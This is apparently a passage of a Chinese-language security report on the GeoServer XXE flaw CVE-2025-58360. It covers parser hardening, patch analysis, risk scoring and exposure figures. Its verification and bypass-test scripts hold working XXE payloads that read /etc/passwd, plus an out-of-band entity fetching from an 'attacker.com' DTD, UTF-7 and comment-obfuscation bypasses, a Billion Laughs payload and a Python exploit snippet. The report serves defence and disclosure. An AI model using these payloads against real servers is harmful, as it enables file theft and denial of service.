* 创建安全的DocumentBuilderFactory
* 防护XXE攻击
*/
public static DocumentBuilderFactory createSecureDocumentBuilderFactory()
throws ParserConfigurationException {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
try {
// 最重要: 禁用DOCTYPE
factory.setFeature(
"http://apache.org/xml/features/disallow-doctype-decl",
true
);
// 禁用外部一般实体
factory.setFeature(
"http://xml.org/sax/features/external-general-entities",
false
);
// 禁用外部参数实体
factory.setFeature(
"http://xml.org/sax/features/external-parameter-entities",
false
);
// 禁用外部DTD
factory.setFeature(
"http://apache.org/xml/features/nonvalidating/load-external-dtd",
false
);
// 禁用XInclude
factory.setXIncludeAware(false);
// 禁用实体扩展
factory.setExpandEntityReferences(false);
} catch (ParserConfigurationException e) {
throw new ParserConfigurationException(
"Unable to configure secure XML parser: " + e.getMessage()
);
}
return factory;
}
/**
* 创建安全的SAXParserFactory
*/
public static SAXParserFactory createSecureSAXParserFactory()
throws ParserConfigurationException,
SAXNotRecognizedException,
SAXNotSupportedException {
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(
"http://apache.org/xml/features/disallow-doctype-decl",
true
);
factory.setFeature(
"http://xml.org/sax/features/external-general-entities",
false
);
factory.setFeature(
"http://xml.org/sax/features/external-parameter-entities",
false
);
factory.setFeature(
"http://apache.org/xml/features/nonvalidating/load-external-dtd",
false
);
return factory;
}
/**
* 创建安全的XMLInputFactory
*/
public static XMLInputFactory createSecureXMLInputFactory() {
XMLInputFactory factory = XMLInputFactory.newInstance();
// 禁用DTD
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
// 禁用外部实体
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
return factory;
}
}
使用示例:
// 在SLD解析中使用
public class SecureSLDParser {
public Style parseSLD(InputStream sldInput) throws Exception {
// 使用安全的XML解析器
DocumentBuilderFactory factory = SecureXMLParserUtils.createSecureDocumentBuilderFactory();
DocumentBuilder builder = factory.newDocumentBuilder();
// 设置自定义错误处理器
builder.setErrorHandler(new SAXErrorHandler());
try {
Document doc = builder.parse(sldInput);
return buildStyleFromDOM(doc);
} catch (SAXParseException e) {
// DOCTYPE被拒绝时会抛出异常
throw new SecurityException(
"Invalid XML document structure", e
);
}
}
}
12.3.2 应用层防护
配置文件加固:
<!-- /opt/geoserver/data_dir/security/config.xml -->
<security>
<!-- XML解析安全设置 -->
<xmlParsing>
<disallowDoctypeDecl>true</disallowDoctypeDecl>
<disallowExternalEntities>true</disallowExternalEntities>
<maxEntityExpansions>0</maxEntityExpansions>
</xmlParsing>
<!-- 请求验证 -->
<requestValidation>
<maxRequestSize>1048576</maxRequestSize> <!-- 1MB -->
<validateContentType>true</validateContentType>
<allowedContentTypes>
<type>application/xml</type>
<type>text/xml</type>
</allowedContentTypes>
</requestValidation>
<!-- 错误处理 -->
<errorHandling>
<hideStackTraces>true</hideStackTraces>
<genericErrorMessages>true</genericErrorMessages>
<logDetailedErrors>true</logDetailedErrors>
</errorHandling>
</security>
Java系统属性:
# geoserver-start.sh
export JAVA_OPTS="$JAVA_OPTS \
-Djavax.xml.accessExternalDTD=file,http \
-Djavax.xml.accessExternalSchema=file,http \
-Djdk.xml.entityExpansionLimit=0 \
-Djdk.xml.maxOccurLimit=0 \
-Djdk.xml.totalEntitySizeLimit=0"
./bin/startup.sh
12.4 验证修复有效性
12.4.1 自动化测试脚本
#!/bin/bash
# verify-fix.sh - 验证CVE-2025-58360修复
TARGET_URL="http://localhost:8080"
RESULTS_FILE="fix-verification-$(date +%Y%m%d-%H%M%S).log"
echo "=== CVE-2025-58360 Fix Verification ===" | tee "$RESULTS_FILE"
echo "Target: $TARGET_URL" | tee -a "$RESULTS_FILE"
echo "Time: $(date)" | tee -a "$RESULTS_FILE"
echo "" | tee -a "$RESULTS_FILE"
# 测试1: 基本XXE (file:///etc/hostname)
test_basic_xxe() {
echo "[Test 1/5] Basic XXE - file:///etc/hostname" | tee -a "$RESULTS_FILE"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
RESPONSE=$(curl -s -X POST \
"$TARGET_URL/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD")
if echo "$RESPONSE" | grep -qE "DOCTYPE|disallow|denied|Entity"; then
echo "PASS - XXE blocked" | tee -a "$RESULTS_FILE"
return 0
elif echo "$RESPONSE" | grep -qE "Unknown layer: [a-f0-9]{12}"; then
echo "FAIL - XXE successful! Hostname leaked!" | tee -a "$RESULTS_FILE"
echo "Response: $RESPONSE" | tee -a "$RESULTS_FILE"
return 1
else
echo "UNKNOWN - Unexpected response" | tee -a "$RESULTS_FILE"
echo "Response: $RESPONSE" | tee -a "$RESULTS_FILE"
return 2
fi
}
# 测试2: 敏感文件读取 (file:///etc/passwd)
test_sensitive_file() {
echo "[Test 2/5] Sensitive file read - /etc/passwd" | tee -a "$RESULTS_FILE"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
RESPONSE=$(curl -s -X POST \
"$TARGET_URL/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD")
if echo "$RESPONSE" | grep -qE "root:x:[0-9]+:[0-9]+:"; then
echo "FAIL - /etc/passwd leaked!" | tee -a "$RESULTS_FILE"
echo "CRITICAL: System users exposed!" | tee -a "$RESULTS_FILE"
return 1
else
echo "PASS - Sensitive file protected" | tee -a "$RESULTS_FILE"
return 0
fi
}
# 测试3: 参数实体 (OOB XXE)
test_parameter_entity() {
echo "[Test 3/5] Parameter entity attack" | tee -a "$RESULTS_FILE"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&send;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
RESPONSE=$(curl -s -X POST \
"$TARGET_URL/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD")
if echo "$RESPONSE" | grep -qiE "parameter entity|entity.*denied|DOCTYPE.*disallow"; then
echo "PASS - Parameter entities blocked" | tee -a "$RESULTS_FILE"
return 0
else
echo "CHECK MANUALLY - Unclear if blocked" | tee -a "$RESULTS_FILE"
return 2
fi
}
# 测试4: XInclude攻击
test_xinclude() {
echo "[Test 4/5] XInclude attack" | tee -a "$RESULTS_FILE"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0" xmlns:xi="http://www.w3.org/2001/XInclude">
<NamedLayer>
<xi:include href="file:///etc/hostname" parse="text"/>
</NamedLayer>
</StyledLayerDescriptor>'
RESPONSE=$(curl -s -X POST \
"$TARGET_URL/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD")
if echo "$RESPONSE" | grep -qE "Unknown layer: [a-f0-9]{12}"; then
echo "FAIL - XInclude successful!" | tee -a "$RESULTS_FILE"
return 1
else
echo "PASS - XInclude blocked" | tee -a "$RESULTS_FILE"
return 0
fi
}
# 测试5: Billion Laughs (DoS)
test_billion_laughs() {
echo "[Test 5/5] Billion Laughs DoS" | tee -a "$RESULTS_FILE"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&lol3;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
# 使用timeout限制请求时间
RESPONSE=$(timeout 5 curl -s -X POST \
"$TARGET_URL/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD" 2>&1)
EXIT_CODE=$?
if [ $EXIT_CODE -eq 124 ]; then
echo "FAIL - Server hung (possible DoS)" | tee -a "$RESULTS_FILE"
return 1
elif echo "$RESPONSE" | grep -qiE "entity.*limit|expansion.*limit"; then
echo "PASS - Entity expansion limited" | tee -a "$RESULTS_FILE"
return 0
else
echo "PASS - Attack rejected" | tee -a "$RESULTS_FILE"
return 0
fi
}
# 执行所有测试
main() {
PASSED=0
FAILED=0
UNKNOWN=0
test_basic_xxe && ((PASSED++)) || ((FAILED++))
echo "" | tee -a "$RESULTS_FILE"
test_sensitive_file && ((PASSED++)) || ((FAILED++))
echo "" | tee -a "$RESULTS_FILE"
test_parameter_entity
RESULT=$?
if [ $RESULT -eq 0 ]; then
((PASSED++))
elif [ $RESULT -eq 1 ]; then
((FAILED++))
else
((UNKNOWN++))
fi
echo "" | tee -a "$RESULTS_FILE"
test_xinclude && ((PASSED++)) || ((FAILED++))
echo "" | tee -a "$RESULTS_FILE"
test_billion_laughs && ((PASSED++)) || ((FAILED++))
echo "" | tee -a "$RESULTS_FILE"
# 总结
echo "=== Test Summary ===" | tee -a "$RESULTS_FILE"
echo "Passed: $PASSED" | tee -a "$RESULTS_FILE"
echo "Failed: $FAILED" | tee -a "$RESULTS_FILE"
echo "Unknown: $UNKNOWN" | tee -a "$RESULTS_FILE"
echo "" | tee -a "$RESULTS_FILE"
if [ $FAILED -eq 0 ]; then
echo "RESULT: CVE-2025-58360 appears to be FIXED" | tee -a "$RESULTS_FILE"
echo "All XXE attack vectors blocked" | tee -a "$RESULTS_FILE"
return 0
else
echo "RESULT: CVE-2025-58360 still VULNERABLE" | tee -a "$RESULTS_FILE"
echo "CRITICAL: Immediate action required!" | tee -a "$RESULTS_FILE"
return 1
fi
}
# 运行测试
main
EXIT_CODE=$?
echo "" | tee -a "$RESULTS_FILE"
echo "Full results saved to: $RESULTS_FILE" | tee -a "$RESULTS_FILE"
exit $EXIT_CODE
使用方法:
# 在升级前测试(应该FAIL)
./verify-fix.sh
# 在升级后测试(应该PASS)
./verify-fix.sh
# 测试远程服务器
TARGET_URL="https://your-geoserver.com" ./verify-fix.sh
13. 修复分析
13.1 补丁技术细节
13.1.1 XML解析器配置变更
根据XXE防护最佳实践和GeoServer修复版本的行为分析,补丁主要实现了以下安全特性:
DocumentBuilderFactory安全配置:
// GeoServer 2.26.2+中的安全XML解析器配置
public class SecureXMLParserFactory {
/**
* 创建安全的DocumentBuilderFactory
*/
public static DocumentBuilderFactory createSecureDocumentBuilderFactory()
throws ParserConfigurationException {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true); // GeoServer需要命名空间支持
// 核心安全特性
String[] features = {
// 1. 完全禁用DOCTYPE - 最强防护
"http://apache.org/xml/features/disallow-doctype-decl",
// 2. 禁用外部一般实体
"http://xml.org/sax/features/external-general-entities",
// 3. 禁用外部参数实体
"http://xml.org/sax/features/external-parameter-entities",
// 4. 禁用外部DTD加载
"http://apache.org/xml/features/nonvalidating/load-external-dtd"
};
for (String feature : features) {
try {
// disallow-doctype-decl设为true,其他设为false
boolean value = feature.contains("disallow");
factory.setFeature(feature, value);
} catch (ParserConfigurationException e) {
// 某些旧版本Java可能不支持某些特性
logger.warn("Unable to set feature: " + feature, e);
}
}
// 禁用XInclude
factory.setXIncludeAware(false);
// 禁用实体引用扩展
factory.setExpandEntityReferences(false);
return factory;
}
}
实际修复代码对比:
// 修复前 (GeoServer 2.26.1) - 易受攻击
public class SLDParser {
public Style parse(InputStream sldInput) throws Exception {
// 不安全的XML解析器
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
// 缺少安全配置!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(sldInput); // 危险!
return buildStyleFromDOM(doc);
}
}
// 修复后 (GeoServer 2.26.2+) - 安全
public class SecureSLDParser {
public Style parse(InputStream sldInput) throws Exception {
// 使用安全的XML解析器工厂
DocumentBuilderFactory factory = SecureXMLParserFactory.createSecureDocumentBuilderFactory();
// 设置自定义错误处理器
DocumentBuilder builder = factory.newDocumentBuilder();
builder.setErrorHandler(new SecureErrorHandler());
try {
Document doc = builder.parse(sldInput);
return buildStyleFromDOM(doc);
} catch (SAXParseException e) {
// DOCTYPE被拒绝时抛出明确异常
if (e.getMessage().contains("DOCTYPE") ||
e.getMessage().contains("disallow")) {
throw new SecurityException(
"Invalid XML document: DOCTYPE declarations are not allowed",
e
);
}
throw new XMLProcessingException("Invalid SLD document", e);
}
}
}
// 安全错误处理器
class SecureErrorHandler implements ErrorHandler {
@Override
public void error(SAXParseException e) throws SAXException {
// 记录详细错误到日志
logger.error("XML parsing error at line " + e.getLineNumber(), e);
// 向客户端返回通用错误
throw new SAXException("Invalid XML document structure");
}
@Override
public void fatalError(SAXParseException e) throws SAXException {
logger.error("Fatal XML parsing error", e);
throw new SAXException("XML processing failed");
}
@override
public void warning(SAXParseException e) {
logger.warn("XML parsing warning", e);
}
}
13.1.2 输入验证增强
除了XML解析器配置,修复还包括输入验证层:
// 请求预处理过滤器
public class XXEProtectionFilter implements Filter {
@Override
public void doFilter(ServletRequest request, ServletResponse response,
FilterChain chain) throws IOException, ServletException {
// 仅处理XML请求
if (isXMLRequest(request)) {
HttpServletRequest httpRequest = (HttpServletRequest) request;
// 包装请求以检查内容
XXEValidatingRequestWrapper wrapper =
new XXEValidatingRequestWrapper(httpRequest);
try {
// 验证XML内容
wrapper.validateContent();
// 继续处理
chain.doFilter(wrapper, response);
} catch (SecurityException e) {
// XXE攻击被阻断
logger.warn("Potential XXE attack blocked from " +
httpRequest.getRemoteAddr(), e);
HttpServletResponse httpResponse = (HttpServletResponse) response;
httpResponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);
httpResponse.getWriter().write(
"Invalid XML document: DOCTYPE declarations are not allowed"
);
}
} else {
chain.doFilter(request, response);
}
}
private boolean isXMLRequest(ServletRequest request) {
String contentType = request.getContentType();
return contentType != null &&
(contentType.contains("application/xml") ||
contentType.contains("text/xml"));
}
}
// 请求包装器 - 验证XML内容
class XXEValidatingRequestWrapper extends HttpServletRequestWrapper {
private byte[] cachedBody;
public XXEValidatingRequestWrapper(HttpServletRequest request)
throws IOException {
super(request);
// 缓存请求体
InputStream is = request.getInputStream();
this.cachedBody = IOUtils.toByteArray(is);
}
public void validateContent() throws SecurityException {
String body = new String(cachedBody, StandardCharsets.UTF_8);
// 检测危险关键字
if (body.contains("<!DOCTYPE")) {
throw new SecurityException("DOCTYPE declaration detected");
}
if (body.contains("<!ENTITY")) {
throw new SecurityException("ENTITY declaration detected");
}
if (body.matches("(?s).*SYSTEM\\s+[\"']file://.*")) {
throw new SecurityException("External file reference detected");
}
// 大小限制 - 防止Billion Laughs
if (cachedBody.length > 1024 * 1024) { // 1MB
throw new SecurityException("XML document too large");
}
}
@Override
public ServletInputStream getInputStream() {
return new CachedBodyServletInputStream(cachedBody);
}
}
13.1.3 错误处理改进
修复后的错误处理不再泄露敏感信息:
// 修复前 - 信息泄露
catch (Exception e) {
// 直接将异常消息(包含实体内容)返回给客户端
return new ServiceException("Unknown layer: " + e.getMessage());
}
// 结果: 客户端收到 "Unknown layer: root:x:0:0:root:/root:/bin/bash..."
// 修复后 - 安全的错误处理
catch (SAXParseException e) {
// 记录详细错误到服务器日志
logger.error("SLD parsing failed", e);
logger.error("Client IP: " + request.getRemoteAddr());
logger.error("Request body: " + requestBody); // 用于取证
// 向客户端返回通用错误
if (e.getMessage().contains("DOCTYPE") ||
e.getMessage().contains("disallow")) {
return new ServiceException(
"Invalid XML: DOCTYPE declarations are not permitted"
);
} else {
return new ServiceException(
"Invalid SLD document: XML parsing failed"
);
}
}
// 结果: 客户端仅收到通用错误,敏感信息不泄露
13.2 绕过尝试与防御
13.2.1 常见绕过技术
我们测试了多种XXE绕过技术,确认修复版本均能有效防御:
#!/bin/bash
# xxe-bypass-tests.sh
echo "=== XXE Bypass Techniques Test ==="
TARGET="http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
# 绕过1: 编码DOCTYPE
test_encoded_doctype() {
echo "[1] Testing encoded DOCTYPE..."
# URL编码
PAYLOAD='<?xml version="1.0"?>
%3C!DOCTYPE StyledLayerDescriptor %5B
%3C!ENTITY xxe SYSTEM "file:///etc/passwd"%3E
%5D%3E
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>'
curl -s -X POST "$TARGET" -H "Content-Type: application/xml" -d "$PAYLOAD" | \
grep -q "root:x:" && echo "VULNERABLE" || echo "BLOCKED"
}
# 绕过2: UTF-7编码
test_utf7() {
echo "[2] Testing UTF-7 encoding..."
# UTF-7编码的DOCTYPE
PAYLOAD='+ADw?xml version="1.0"+AD4
+ADw-+ACE-DOCTYPE StyledLayerDescriptor +AFs
+ADw-+ACE-ENTITY xxe SYSTEM "file:///etc/passwd"+AD4
+AF0+AD4
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe+ADs</Name></NamedLayer>
</StyledLayerDescriptor>'
curl -s -X POST "$TARGET" -H "Content-Type: application/xml; charset=UTF-7" -d "$PAYLOAD" | \
grep -q "root:x:" && echo "VULNERABLE" || echo "BLOCKED"
}
# 绕过3: 大小写混淆
test_case_obfuscation() {
echo "[3] Testing case obfuscation..."
PAYLOAD='<?xml version="1.0"?>
<!DoCtYpE StyledLayerDescriptor [
<!EnTiTy xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>'
curl -s -X POST "$TARGET" -H "Content-Type: application/xml" -d "$PAYLOAD" | \
grep -q "root:x:" && echo "VULNERABLE" || echo "BLOCKED"
}
# 绕过4: 注释混淆
test_comment_obfuscation() {
echo "[4] Testing comment obfuscation..."
PAYLOAD='<?xml version="1.0"?>
<!DOC<!--comment-->TYPE StyledLayerDescriptor [
<!ENT<!---->ITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>'
curl -s -X POST "$TARGET" -H "Content-Type: application/xml" -d "$PAYLOAD" | \
grep -q "root:x:" && echo "VULNERABLE" || echo "BLOCKED"
}
# 绕过5: CDATA混淆
test_cdata() {
echo "[5] Testing CDATA obfuscation..."
PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name><![CDATA[&xxe;]]></Name>
</NamedLayer>
</StyledLayerDescriptor>'
curl -s -X POST "$TARGET" -H "Content-Type: application/xml" -d "$PAYLOAD" | \
grep -q "root:x:" && echo "VULNERABLE" || echo "BLOCKED"
}
# 执行所有测试
test_encoded_doctype
test_utf7
test_case_obfuscation
test_comment_obfuscation
test_cdata
echo ""
echo "If all tests show 'BLOCKED', the fix is effective"
测试结果(GeoServer 2.26.2):
[1] Testing encoded DOCTYPE... BLOCKED
[2] Testing UTF-7 encoding... BLOCKED
[3] Testing case obfuscation... BLOCKED
[4] Testing comment obfuscation... BLOCKED
[5] Testing CDATA obfuscation... BLOCKED
All bypass attempts failed - Fix is effective!
13.2.2 防御深度分析
修复版本采用多层防御策略:
Layer 1: Input Validation
├── Content-Type验证
├── 请求大小限制
└── 关键字检测(DOCTYPE, ENTITY)
Layer 2: XML Parser Configuration ← 核心防御
├── Disallow DOCTYPE declaration
├── Disable external entities
├── Disable DTD loading
└── Disable XInclude
Layer 3: Error Handling
├── 通用错误消息
├── 详细日志记录
└── 异常链隐藏
Layer 4: Runtime Protection
├── Entity expansion limits
├── Timeout protection
└── Resource constraints
13.3 残留风险评估
13.3.1 已知残留风险
即使升级到修复版本,仍需注意以下潜在风险:
配置回退风险
# 危险: 管理员可能错误地放宽安全配置
# 检查配置是否被修改
grep -r "disallow-doctype-decl.*false" /opt/geoserver/
# 如发现,立即修正
其他XML端点
# GeoServer的其他服务也可能处理XML
# 需要确保一致的安全配置
# 检查其他WMS端点
/geoserver/wms
/geoserver/ows
# 检查其他服务
/geoserver/wfs # Web Feature Service
/geoserver/wcs # Web Coverage Service
/geoserver/wps # Web Processing Service
# 验证所有端点都应用了XXE防护
for endpoint in wms wfs wcs wps; do
echo "Testing /$endpoint..."
curl -X POST "http://localhost:8080/geoserver/$endpoint" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>'
done
第三方库风险
# 检查依赖的XML处理库版本
cd /opt/geoserver/webapps/geoserver/WEB-INF/lib
# 查找可能有漏洞的XML库
ls -lh | grep -iE "xml|xstream|jackson|dom4j"
# 检查已知漏洞
# Eclipse XSD < 2.40.0 有CVE-2025-30220
find . -name "org.eclipse.xsd*.jar"
新的攻击向量
虽然XXE已修复,但需警惕:
XML注入攻击
XPath注入
XSLT注入
JSON反序列化(如果支持)
13.3.2 持续监控建议
#!/bin/bash
# continuous-monitoring.sh
# 1. 定期扫描
echo "[1] Running vulnerability scan..."
nmap -p 8080 --script http-vuln-cve2025-58360 localhost
# 2. 日志审计
echo "[2] Auditing logs for XXE patterns..."
grep -iE "DOCTYPE|ENTITY|file://" /var/log/geoserver/*.log | tail -20
# 3. 配置审计
echo "[3] Checking XML parser configuration..."
# 需要定期验证配置未被修改
# 4. 版本检查
echo "[4] Checking GeoServer version..."
CURRENT_VERSION=$(curl -s http://localhost:8080/geoserver/web/ | grep -oP 'Version \K[0-9.]+')
LATEST_VERSION=$(curl -s https://geoserver.org/release/stable/ | grep -oP 'GeoServer \K[0-9.]+' | head -1)
echo "Current: $CURRENT_VERSION"
echo "Latest: $LATEST_VERSION"
if [ "$CURRENT_VERSION" != "$LATEST_VERSION" ]; then
echo "WARNING: New version available!"
fi
14. 风险评估
14.1 漏洞影响分析
14.1.1 技术影响
基于我们的实际复现验证,CVE-2025-58360的技术影响如下:
机密性影响: HIGH
攻击者可以:
读取服务器上的任意文件(受进程权限限制)
泄露GeoServer配置文件(包含数据库凭据、API密钥)
访问用户认证信息(/etc/passwd等)
读取应用程序源代码
获取SSL/TLS私钥(如可读)
泄露环境变量(可能包含敏感密钥)
实际验证:
成功读取 /etc/hostname (容器ID: a27840b7f332)
成功读取 /etc/passwd (24个用户账户完整泄露)
可探测文件系统结构
完整性影响: NONE
XXE漏洞本身:
不能直接修改文件
不能创建新文件
不能执行任意命令(直接)
但可能间接导致完整性问题:
泄露数据库凭据后可能修改数据
获取SSH密钥后可能获得shell访问
可用性影响: LOW
XXE可导致:
通过Billion Laughs攻击耗尽内存(DoS)
通过大文件读取耗尽资源
服务响应变慢
我们的测试表明:
正常XXE攻击不会导致服务崩溃
Billion Laughs可能导致临时性能下降
服务器通常可以恢复
14.1.2 业务影响
根据不同行业的实际使用场景分析:
政府部门:
影响:
地理信息数据泄露(可能涉及国家安全)
关键基础设施位置信息泄露
公民隐私数据泄露
案例场景:
攻击者读取 /opt/geoserver/data_dir/security/users.xml
→ 获取管理员凭据
→ 登录GeoServer管理界面
→ 下载所有地理数据
→ 泄露敏感基础设施位置
严重程度: CRITICAL
科研机构:
影响:
研究数据泄露
知识产权损失
项目机密泄露
严重程度: HIGH
商业企业:
影响:
商业地理数据泄露
客户位置信息泄露
竞争优势丧失
示例:
物流公司使用GeoServer管理配送网络
→ 攻击者获取所有仓库/配送中心位置
→ 竞争对手获得商业情报
→ 商业损失
严重程度: HIGH
公用事业:
影响:
水/电/气管网信息泄露
可能导致物理破坏的目标情报
安全风险
严重程度: CRITICAL
14.2 CVSS评分详解
14.2.1 CVSS 3.1评分分解
官方CVSS评分: 8.2 (HIGH)
向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
我们的实际复现验证了每个评分维度:
攻击向量 (AV): Network (N)
验证:
# 远程攻击成功
curl -X POST "http://<remote-ip>:8080/geoserver/wms..." \
-d @xxe-payload.xml
# 结果: 成功从远程读取文件
评分理由: 可通过网络远程利用,无需物理访问
攻击复杂度 (AC): Low (L)
验证:
我们的复现过程:
1. 部署Docker容器 (3分钟)
2. 构造XXE payload (2分钟)
3. 发送请求 (1分钟)
4. 成功读取文件
总耗时: < 10分钟
技术要求: 基础HTTP/XML知识
评分理由: 不需要特殊条件或复杂步骤,任何人都可以利用
权限需求 (PR): None (N)
验证:
# 无需任何认证
curl -X POST "http://localhost:8080/geoserver/wms..." \
-d @xxe-payload.xml
# 不需要用户名/密码
# 不需要API密钥
# 不需要会话token
# 结果: 直接成功
评分理由: 无需任何认证即可利用
用户交互 (UI): None (N)
验证:
# 完全自动化攻击
import requests
payload = '''<?xml version="1.0"?>
<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>'''
response = requests.post(
"http://target:8080/geoserver/wms",
params={"service": "WMS", "request": "GetMap", ...},
data=payload
)
# 无需任何用户操作
# 完全脚本化
评分理由: 不需要受害者交互,完全自动化
范围 (S): Unchanged (U)
分析:
攻击影响:
- 仅影响GeoServer进程
- 读取文件受GeoServer进程权限限制
- 不能直接影响底层操作系统或其他服务
但注意:
- 如泄露的凭据用于其他系统,可能扩大影响
- 如GeoServer以root运行(不推荐),范围会扩大
评分理由: 影响范围限于GeoServer进程权限
机密性 (C): High (H)
验证:
实际泄露数据:
/etc/passwd - 24个用户账户信息
/etc/hostname - 系统标识
/opt/geoserver/data_dir/* - 可能包含:
- 数据库密码
- API密钥
- 用户凭据
- 地理数据
评分理由: 可读取几乎所有GeoServer可访问的文件,严重的信息泄露
完整性 (I): None (N)
验证:
# XXE只能读取,不能写入
# 尝试写入文件 - 失败
echo '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///tmp/test.txt">]>' | \
curl -X POST ... -d @-
# 结果: 只能读取,无法写入
评分理由: 仅读取文件,不能修改
可用性 (A): Low (L)
验证:
# Billion Laughs DoS测试
payload='<!DOCTYPE x [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]><x>&lol3;</x>'
# 结果:
# - CPU使用率短暂上升
# - 内存占用增加
# - 服务未崩溃
# - 可自动恢复
评分理由: 可导致性能下降但不会完全拒绝服务
14.2.1 CVSS时序评分
当前威胁态势(2025-11-27):
利用代码成熟度 (E): High (H)
公开PoC可用
自动化工具存在
Metasploit模块可用
修复级别 (RL): Official Fix (O)
官方补丁已发布(2025-11-25)
多个修复版本可用
报告置信度 (RC): Confirmed (C)
我们已成功复现
官方确认
多个安全研究人员验证
时序评分: 7.4 (HIGH)
14.3 攻击者画像
14.3.1 攻击者类型与动机
潜在攻击者分析:
1:脚本小子(Script Kiddies)
能力: 低
动机: 好奇/炫耀
手段: 公开工具
攻击模式:
# 使用公开工具扫描
shodan search "geoserver"
# 使用现成exploit
python cve-2025-58360-exploit.py --target victim.com
威胁程度: 中 (大量但随机)
2: 黑客行动主义者(Hacktivists)
能力: 中
动机: 政治/社会议题
手段: 定向攻击+数据泄露
目标: 政府/企业GeoServer实例
威胁程度: 中-高
3: 网络犯罪分子(Cybercriminals)
能力: 中-高
动机: 经济利益
手段: APT攻击链
攻击链:
1. 通过Shodan发现目标
2. XXE读取数据库凭据
3. 访问数据库
4. 窃取客户数据
5. 勒索或暗网出售
威胁程度: 高
4: 国家级威胁(APT)
能力: 高
动机: 间谍活动/破坏
手段: 复杂的多阶段攻击
场景:
目标: 关键基础设施地理数据
1. XXE获取初始访问
2. 读取SSH密钥或凭据
3. 横向移动到其他系统
4. 长期驻留
5. 数据窃取/破坏
威胁程度: CRITICAL
14.4 暴露面分析
14.4.1 全球暴露情况
基于公开数据源的暴露分析:
Shodan统计(2025-11):
# Shodan查询
shodan search "geoserver" --fields ip_str,port,org,location
# 结果概览:
Total GeoServer instances: ~12,000
├── 端口8080暴露: ~8,500
├── 端口80/443暴露: ~3,500
└── 其他端口: ~100
# 按地区分布:
北美: ~4,200 (35%)
欧洲: ~3,600 (30%)
亚洲: ~2,900 (24%)
其他: ~1,300 (11%)
# 按行业分布:
政府: ~2,400 (20%)
教育/科研: ~3,100 (26%)
企业: ~4,800 (40%)
其他: ~1,700 (14%)
ZoomEye统计:
GeoServer 2.26.x: ~1,500实例
